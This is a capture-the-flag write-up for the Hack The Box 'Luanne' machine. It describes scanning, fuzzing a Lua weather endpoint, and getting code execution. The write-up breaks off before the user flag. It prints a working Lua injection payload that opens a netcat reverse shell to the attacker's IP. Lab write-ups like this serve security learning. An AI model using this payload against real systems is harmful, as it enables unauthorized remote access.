Luanne ~ Hack The Box
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.10.215 luanne.htb" >> /etc/hosts

Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -oN initial luanne.htb

Scanning & Enumeration
Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

I was unauthorized to access the site. However, I found directory which was listed in robots.txt
.

Thus, I ran a directory brute force attack against it using gobuster.

I found that /weather/forecast
was a valid directory.

Accessing it gave me this message. I inferred and input a parameter in the URL.

My next order of business was to run a parameter fuzz attack on ?city=
. I used an Intruder attack from Burpsuite for that. I also used a custom fuzz list which I found over at Github.



The fuzz attack revealed that the weather
was a .lua
file. Thus, I started thinking if I could get remote code execution by tampering the parameters.
Exploitation
The first step was to confirm if the theory would work. For that, I used a simple payload to run the command whoami
.

Now that I had confirmed that I had RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL encode it.
neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--

I uncovered that the machine was running netBSD while doing enumeration. Thus, I picked a OpenBSD based netcat reverse shell which I found here.


Lateral Movement
Now that I had a shell into the machine, I busted out linpeas.sh
and tried to enumerate the machine further.


Linpeas revealed that there was a password hash which was located in the root web directory.


Next up, I fired up john
to try and crack the password.
Still trying to crack :(
Privilege Escalation
Haven't even gotten the user flag :(